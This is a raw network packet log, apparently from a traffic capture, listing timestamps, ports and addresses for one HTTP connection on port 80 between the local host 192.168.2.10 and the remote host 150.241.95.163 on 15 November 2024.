Nov 15, 2024 10:28:58.936873913 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.940109015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.940128088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.940140963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.940155029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.940284967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.940295935 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.940356016 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.940356016 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.943701982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.943716049 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.943727970 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.943774939 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.944139957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.944211006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.944279909 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.947248936 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.947272062 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.947283983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.947329998 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.947355032 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.951172113 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.951193094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.951205015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.951339960 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.954371929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.954396963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.954408884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.954473019 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.954499006 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.958739042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.958753109 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.958841085 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.960699081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.960711002 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.960820913 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.961438894 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.961452961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.961463928 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.961508989 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.964754105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.964797974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.964809895 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.964822054 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.964884996 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.964988947 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.968197107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.968209028 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.968228102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.968238115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.968267918 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.968548059 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.971849918 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.971889973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.971903086 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.971925974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.971935987 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.971955061 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.972032070 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.979336977 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.979413033 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.988184929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988198996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988209963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988225937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988236904 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988326073 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.988326073 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.988450050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988462925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988473892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988504887 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.988533020 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988544941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988559961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.988596916 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.988596916 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.989290953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.989335060 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.989358902 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.989453077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.989494085 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.989504099 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.989506006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.989552975 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.990699053 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.990721941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.990732908 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.990780115 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.994122982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.994132042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.994199038 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.994231939 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.994241953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.994277954 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.995341063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.995384932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.995393038 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.995397091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.995465994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.995471001 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.995479107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.995491028 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.995537996 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.997865915 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.997889996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.997900009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.997942924 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.997942924 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.999840021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.999869108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.999878883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.999917030 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.002680063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.002757072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.002772093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.002799034 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.002902985 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.004949093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.004996061 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.005007029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.005059004 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.006947994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.006969929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.006980896 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.007018089 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.007018089 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.009428978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.009450912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.009462118 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.009581089 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.009607077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.009618998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.009629965 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.009665012 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.009665012 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.011670113 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.011682034 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.011693001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.011724949 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.014995098 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.015007973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.015019894 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.015073061 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.015100956 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.017608881 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.017621994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.017632961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.017671108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.018699884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.018733978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.018744946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.018783092 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.018834114 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.018846035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.018857002 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.018883944 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.018883944 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.022317886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.022365093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.022377014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.022475958 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.022475958 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.027276993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.027288914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.027299881 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.027358055 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.030181885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.030195951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.030209064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.030483961 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.030483961 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.034650087 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.034668922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.034682035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.034759998 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.038495064 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.038692951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.039370060 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.039391041 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.039422989 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.039433002 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.039465904 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.039465904 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.042660952 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.042674065 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.042685986 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.042741060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.042783976 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.048540115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.048599005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.048685074 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.048696041 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.048738003 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.049879074 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.049938917 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.049949884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.049968958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.049981117 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.049982071 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.049993038 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.050043106 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.050044060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.053224087 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.053236961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.053248882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.053299904 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.057040930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.057054043 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.057065010 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.057104111 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.057183027 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.059143066 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.060688019 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.060698986 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.060712099 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.060733080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.060744047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.060755968 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.060756922 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.060789108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.060936928 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.064271927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.064285994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.064296961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.064438105 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.068105936 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.068119049 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.068129063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.068160057 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.068603992 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.071252108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.071304083 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.071325064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.071353912 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.077724934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.077740908 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.077754021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.077765942 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.077842951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.077842951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.078321934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.078334093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.078344107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.078363895 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.078391075 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.081692934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.081720114 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.081729889 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.081742048 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.081798077 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.081912041 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.085479975 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.085505962 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.085515976 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.085563898 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.088707924 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.088721037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.088732004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.088787079 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.088794947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.088809013 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.088814974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.088901043 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.089040041 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.105082989 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105143070 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105155945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105168104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105227947 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.105232000 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105283976 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105298042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105318069 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.105341911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105355024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105366945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105379105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.105391026 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.105391026 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.105436087 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.106209993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.106256008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.106322050 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.106439114 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.106457949 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.106468916 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.106504917 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.107391119 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.107403040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.107516050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.107526064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.107537985 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.107551098 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.107563019 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.107563019 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.107601881 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.111026049 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.111040115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.111083984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.111093044 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.111095905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.111200094 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.112524033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.112535954 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.112548113 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.112560034 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.112585068 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.112622023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.112632036 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.112658978 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.113919973 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.114764929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.114820004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.114831924 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.114871979 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.114871979 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.116869926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.116883039 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.116899967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.116964102 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.119537115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.119560957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.119573116 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.119672060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.119672060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.121900082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.121912956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.121923923 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.122132063 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.123946905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.123960018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.123974085 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.124054909 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.124056101 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.126399994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.126413107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.126425982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.126457930 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.126529932 CET	80	49762	150.241.95.163	192.168.2.10
